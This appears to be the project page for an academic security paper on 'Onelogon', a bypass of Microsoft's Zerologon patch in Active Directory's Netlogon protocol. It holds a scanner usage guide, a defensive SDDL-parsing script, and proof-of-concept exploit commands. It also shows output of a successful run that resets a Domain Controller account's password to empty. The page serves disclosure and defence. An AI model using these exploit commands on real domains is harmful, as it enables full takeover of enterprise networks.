Onelogon: Taking over Active Directory Accounts via Netlogon

Authors

Alexander Neff, Tobias Holl, Kevin Borgolte

Publication

Proceedings of the 20th USENIX WOOT Conference on Offensive Technologies (WOOT), August 2026

Abstract

Microsoft’s Active Directory (AD) is a critical component of the IT infrastructure of numerous enterprises. Thus, security vulnerabilities in AD can have dire consequences for the security posture of an organization’s IT infrastructure. At the core of the AD architecture is the Netlogon Remote Protocol, which is used to manage computer accounts, delegate authentication requests, and various other management tasks.

In 2020, Tervoort identified Zerologon, a critical vulnerability in Netlogon, which allowed attackers to fully compromise an AD management domain. In turn, Microsoft released two patches: one aiming to rectify the cryptographic vulnerability that enabled the attack, and the second one to ensure that all Netlogon communication is signed and sealed.

In this paper, we analyze these patches and show that they are insufficient to mitigate the underlying vulnerabilities. We show that the cryptographic patch can be bypassed by an unprivileged attacker within the AD domain. We introduce the Onelogon attack with two distinct variants for varying attacker capabilities, both of which allow an attacker to take over a vulnerable AD account in approximately 30 minutes. If this AD account belongs to a Domain Controller, an attacker can leverage Onelogon to fully compromise the AD domain.

With the goal of mitigating the attacks, we identified their underlying root cause: the incorrect use of AES-CFB8 encryption. Both the earlier Zerologon attack and our new attack exploit how Netlogon incorrectly uses AES-CFB8. Finally, we provide and compare various mitigation and detection approaches for Microsoft and AD operators to prevent account takeover attacks and authentication bypasses in the short term and fundamentally. Unfortunately, addressing the underlying root cause requires a backward-incompatible change to Netlogon: reimplementing AES-CFB8 correctly.

We disclosed this issue to Microsoft and CERT-Bund, but do not expect any fixes to be forthcoming. In the meantime, we advise users to apply the mitigation and detection strategies outlined in this paper.

Source Code: github.com/rub-softsec/onelogon

High-level Summary

The vulnerability described in our paper exploits a weakness in the 2020 cryptographic patch for the Zerologon vulnerability. Accounts listed in the group policy (the VulnerableChannelAllowList) intended to support legacy setups that do not support Netlogon signing and sealing are vulnerable to this attack. A detailed description of the vulnerability, the expected full attack chain, and possible mitigations can be found in the paper.

Scanning for Vulnerable Setups

To determine which accounts a Domain Controller lists in its VulnerableChannelAllowList, we provide a scanner that parses the registry hive and GPO volume share of the Domain Controller. Note that accessing the registry for this scan requires Domain Administrator privileges (the exploit, of course, does not).

# Use the specified username and password to scan the target DC.
poetry run scan --dc-ip <IP of target DC> \
                --username <username> \
                --password <password>

# Specify `--help` to get additional usage instructions.
poetry run scan --help

A positive scan result (there are vulnerable accounts on the Domain Controller) prints the security descriptor that lists the vulnerable accounts (in Microsoft’s Security Descriptor Definition Language, SDDL):

~$ poetry run scan --dc-ip 192.168.108.244 -u Administrator -p Xb52RLIiL5k2BhMC
[+] Found 1 matching policies in SYSVOL Share.
[+] Found vulnerable channel allow list in policy '{6AC1786C-016F-11D2-945F-00C04fB984F9}':
    'O:BAG:BAD:(A;;RC;;;BA)(A;;RC;;;S-1-5-21-1725695585-1077004420-3792776154-1000)'
[+] Found VulnerableChannelAllowList registry configuration:
    O:BAG:BAD:(A;;RC;;;BA)(A;;RC;;;S-1-5-21-1725695585-1077004420-3792776154-1000)

A negative result (the target DC is not vulnerable) will instead look like this:

~$ poetry run scan --dc-ip 192.168.108.244 -u Administrator -p Xb52RLIiL5k2BhMC
[-] No matching policies found in SYSVOL Share.
[-] Error while querying registry: RRP SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND
    - The system cannot find the file specified.
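The scanner prints the allow list as an SDDL string, and a defender reviewing many DCs wants the trustees behind it rather than the raw descriptor. The following Python (an added example, not part of the Onelogon repository) splits such a descriptor into owner, group and DACL entries and returns the SIDs granted access; the alias table covers only well-known fixed SIDs (an assumption of this example), while domain-relative aliases such as DA or DC are left unresolved because they depend on the domain SID.

```python
import re
from collections import namedtuple

# SDDL aliases with fixed SIDs; domain-relative aliases (DA, DC, ...) depend
# on the domain SID and are left unresolved.
WELL_KNOWN_SIDS = {
    "BA": "S-1-5-32-544",  # BUILTIN\Administrators
    "AU": "S-1-5-11",      # Authenticated Users
    "WD": "S-1-1-0",       # Everyone
    "SY": "S-1-5-18",      # LOCAL SYSTEM
}

# The descriptor printed by the scanner run shown above.
SAMPLE_SDDL = ("O:BAG:BAD:(A;;RC;;;BA)"
               "(A;;RC;;;S-1-5-21-1725695585-1077004420-3792776154-1000)")

# ace_type "A" = access allowed, "D" = access denied; trustee is a SID string.
Ace = namedtuple("Ace", "ace_type flags rights trustee")

def resolve(token):
    return WELL_KNOWN_SIDS.get(token, token) if token else None

def parse_sddl(sddl: str) -> dict:
    """Split SDDL into owner, group and DACL ACEs. Component values never
    contain ':', so every '[OGDS]:' marks the start of a component."""
    keys = list(re.finditer(r"([OGDS]):", sddl))
    parts = {}
    for i, m in enumerate(keys):
        end = keys[i + 1].start() if i + 1 < len(keys) else len(sddl)
        parts[m.group(1)] = sddl[m.end():end]
    aces = []
    # DACL flags (e.g. "PAI") come before the first "("; each ACE is
    # (type;flags;rights;object_guid;inherit_object_guid;sid[;attr]).
    for body in re.findall(r"\(([^)]*)\)", parts.get("D", "")):
        f = body.split(";")
        if len(f) < 6:
            raise ValueError(f"malformed ACE: ({body})")
        aces.append(Ace(f[0], f[1], f[2], resolve(f[5])))
    return {"owner": resolve(parts.get("O")),
            "group": resolve(parts.get("G")), "aces": aces}

def allow_listed_sids(sddl: str) -> list:
    """Trustees granted access ("A" ACEs): the accounts this policy still lets
    set up an unsigned, unsealed Netlogon secure channel."""
    out = []
    for ace in parse_sddl(sddl)["aces"]:
        if ace.ace_type == "A" and ace.trustee not in out:
            out.append(ace.trustee)
    return out
```

Resolving the returned domain SIDs to account names (and checking whether any of them is a Domain Controller machine account) still requires a directory lookup.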

Exploitation

To run the proof-of-concept exploit against a target Domain Controller, select a vulnerable account first. You will need the Domain Controller’s IP address, its host name, and the name of the vulnerable account.

In our example setup, the vulnerable Domain Controller is named DC. Its machine account (DC$) is included in the GPO policy and therefore vulnerable to Onelogon.

# Run the meet-in-the-middle attack (Section 4.5 of the paper)
poetry run onelogon --dc-ip <IP of target DC> \
                    --dc-name <Name of target DC> \
                    --username <Target account name>

# Run the 24-bit brute-force with a computer account (Section 4.4)
poetry run onelogon --dc-ip <IP of target DC> \
                    --dc-name <Name of target DC> \
                    --username <Target account name> \
                    --comp-username <Computer account> \
                    --comp-pass <Computer account password>

# Run the (slow) 32-bit brute-force with a computer account
poetry run onelogon --naive --dc-ip <IP of target DC> \
                    --dc-name <Name of target DC> \
                    --username <Target account name> \
                    --comp-username <Computer account> \
                    --comp-pass <Computer account password>

# Run the (very slow) 32-bit brute-force without a computer account
poetry run onelogon --naive --dc-ip <IP of target DC> \
                    --dc-name <Name of target DC> \
                    --username <Target account name>

Successful exploit output

As an illustration, we provide the output of a successful run of the meet-in-the-middle attack against a test VM:

~$ poetry run onelogon --dc-ip 192.168.108.244 --dc-name DC --username 'DC$'
[+] Namespace(dc_name='DC', dc_ip='192.168.108.244', username='DC$', comp_username=None,
    comp_password=None, comp_hash=None, workers=100)
[+] Successfully bound to Netlogon RPC on DC (192.168.108.244)
[+] Successfully bound to Netlogon RPC on DC (192.168.108.244)
[+] Using flags: (0b100001000111111111111111111111)
1: A IGNORED (Account lockout)
1: B NT3.5 BDC continuous update
1: C RC4 support
1: D IGNORED (Promotion count(deprecated))
1: E Supports BDC handling Changelogs
1: F Supports Restarting full DC sync
1: G Does not require ValidationLevel 2 for nongeneric passthrough
1: H Supports DatabaseRedo
1: I Supports refusal of password changes
1: J Supports NetrLogonSendToSam
1: K Supports generic pass-through
1: L Supports concurrent RPC calls
1: M Supports avoid of user account database replication
1: N Supports avoid of Security Authority database replication
1: O Supports Strong keys
1: P Supports transitive trusts
1: Q IGNORED (Supports DNS trusts)
1: R Supports NetrServerPasswordSet2
1: S Supports NetrLogonGetDomainInfo
1: T Supports cross-forest trusts
1: U No NT4 Emulation
0: V Supports RODC pass-through
0: 0
0: 0
1: W Supports AES 128-bit CFB and SHA2
0: 0
0: 0
0: 0
0: 0
1: X IGNORED (Authenticated RPC via lsass supported)
0: Y Supports secure RPC authentication
0: Z Supports Kerberos for secure channel setup
[*] Estimated total tries without flushing: 2^16 / 2

[+] Starting the brute force attack...
[*] ROUND STATS:
[*] REQ:     Took 5.0858272750047036 seconds,
             average time per attempt: 0.00286042028965393909 seconds
[*] TRY:     Took 120.00023781700293 seconds
[*] CLEANUP: Took 5.999754648655653e-08 seconds
[*] ALL:     Took 125.08606619200145 seconds,
             average time per attempt: 0.07035211821822354161 seconds
[*]
[*] TOTAL STATS:
[*] TOTAL:   0.10 hours passed, average time per attempt: 0.06760343967316766178 seconds
[*] TRIES:   5538, average tries per cycle: 1846
[*] Estimated progress: 16.90%, estimated time remaining: 0.51 hours
[+] !!!Successfully authenticated DC$ on DC with b'\x00\x00\x00\x00\x11\x11\x04x'!!!
[+] Password set successfully to empty string!
[+] Successfully set the password of DC$ to an empty string!
[+] All tasks have been processed, stopping workers.
[+] All workers have been stopped.

BibTeX

@inproceedings{woot2026-onelogon,
  title     = {{Onelogon: Taking over Active Directory Accounts via Netlogon}},
  author    = {Neff, Alexander and Holl, Tobias and Borgolte, Kevin},
  booktitle = {Proceedings of the 20th USENIX WOOT Conference on Offensive Technologies (WOOT)},
  code      = {https://github.com/rub-softsec/onelogon},
  date      = {2026-08},
  editor    = {Bianchi, Antonio and Classen, Jiska},
  location  = {Baltimore, MD, USA},
  publisher = {USENIX Association}
}